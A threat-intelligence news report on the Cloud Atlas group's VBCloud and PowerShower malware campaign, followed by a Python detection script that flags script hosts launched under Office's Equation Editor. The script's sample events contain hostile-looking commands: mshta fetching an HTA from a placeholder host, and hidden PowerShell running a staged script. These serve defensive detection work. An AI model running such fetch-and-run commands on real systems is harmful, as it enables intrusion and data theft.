Cloud Atlas Targets Russia with VBCloud Malware
December 27, 2024
Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, has been deploying a previously unknown malware, VBCloud, in its cyber attack campaigns. The majority of the targets, over 80%, are in Russia. Other victims have been identified in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam. This threat group has been active since 2014 and has been linked to cyber attacks in Russia, Belarus, and Transnistria.

The method of infection is a phishing email that carries a malicious document. This document exploits a vulnerability in Microsoft Office's Equation Editor (CVE-2018-0802) to download and execute the malware.

In December 2022, Cloud Atlas deployed a PowerShell-based backdoor called PowerShower. A year later, F.A.C.C.T, a Russian cybersecurity company, revealed that various entities in Russia were targeted by spear-phishing attacks that exploited an older Microsoft Office Equation Editor flaw (CVE-2017-11882) to drop a Visual Basic Script (VBS) payload responsible for downloading an unknown next-stage VBS malware. Kaspersky's recent report reveals that these components are part of VBShower, which is used to download and install PowerShower and VBCloud.

The attack begins with a phishing email that contains a booby-trapped Microsoft Office document. When opened, it downloads a malicious template formatted as an RTF file from a remote server. It then exploits CVE-2018-0802 to fetch and run an HTML Application (HTA) file hosted on the same server. The VBShower backdoor retrieves more VBS payloads from the command-and-control (C2) server. It can reboot the system, gather information about files in various folders, the names of running processes, and scheduled tasks, and install PowerShower and VBCloud. PowerShower downloads and executes next-stage PowerShell scripts from the C2 server and also serves as a downloader for ZIP archive files.

VBCloud uses a public cloud storage service for C2 communications. It collects information about disks, system metadata, files and documents with various extensions, and files related to the Telegram messaging app. The attack chain aims to steal data from victims' devices.
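As an added illustration (not code from the original report or from Kaspersky), the following Python check reconstructs the process ancestry of the chain described above from Sysmon-style process-creation events and flags script hosts (mshta.exe, wscript.exe, cscript.exe, powershell.exe) that descend from Office's Equation Editor (EQNEDT32.EXE). The event layout, PIDs, paths and file names are constructed assumptions for the sample, not indicators from the campaign.

```python
import ntpath
import re

# Constructed process-creation events in a simplified Sysmon Event ID 1 layout.
# Sample data written for this example, not telemetry from the campaign above.
SAMPLE_EVENTS = """
ts=10:00:01 pid=4100 ppid=800 image=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE cmd="WINWORD.EXE /n lure.docx"
ts=10:00:04 pid=4212 ppid=904 image=C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE cmd="EQNEDT32.EXE -Embedding"
ts=10:00:05 pid=4300 ppid=4212 image=C:\\Windows\\System32\\mshta.exe cmd="mshta.exe http://stage.example.invalid/stage.hta"
ts=10:00:07 pid=4350 ppid=4300 image=C:\\Windows\\System32\\wscript.exe cmd="wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\stage1.vbs"
ts=10:00:09 pid=4400 ppid=4350 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd="powershell.exe -w hidden -nop -f C:\\Users\\u\\AppData\\Local\\Temp\\stage2.ps1"
ts=10:05:00 pid=5000 ppid=800 image=C:\\Windows\\System32\\notepad.exe cmd="notepad.exe"
ts=10:06:00 pid=5100 ppid=5000 image=C:\\Windows\\System32\\mshta.exe cmd="mshta.exe C:\\tools\\local.hta"
"""

EVENT_RE = re.compile(r'ts=(\S+) pid=(\d+) ppid=(\d+) image=(.*?) cmd="(.*)"$')

# Equation Editor is launched out-of-process via DCOM, so its parent is normally
# svchost.exe rather than WINWORD.EXE. Anchoring on EQNEDT32.EXE as an ancestor
# catches the HTA -> VBS -> PowerShell chain whichever Office app opened the lure.
EXPLOITED_HOST = "eqnedt32.exe"
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def parse_events(text):
    """Map pid -> event dict with the image reduced to a lower-cased basename."""
    events = {}
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        ts, pid, ppid, image, cmd = m.groups()
        events[int(pid)] = {"ts": ts, "ppid": int(ppid),
                            "image": ntpath.basename(image).lower(), "cmd": cmd}
    return events


def ancestry(events, pid):
    """Return image basenames from the process up to the oldest known ancestor."""
    chain, seen = [], set()
    while pid in events and pid not in seen:  # seen-set guards against pid reuse loops
        seen.add(pid)
        chain.append(events[pid]["image"])
        pid = events[pid]["ppid"]
    return chain


def find_equation_editor_chains(text):
    """Return (pid, root-to-leaf chain) for each script host descending from EQNEDT32."""
    events = parse_events(text)
    hits = []
    for pid, ev in events.items():
        if ev["image"] not in SCRIPT_HOSTS:
            continue
        chain = ancestry(events, pid)
        if EXPLOITED_HOST in chain[1:]:
            hits.append((pid, list(reversed(chain))))
    return hits


if __name__ == "__main__":
    for pid, chain in find_equation_editor_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: {' -> '.join(chain)}")
```

The unrelated mshta.exe launched from notepad.exe in the sample is deliberately left unflagged, which is the point of matching on ancestry rather than on the script host alone.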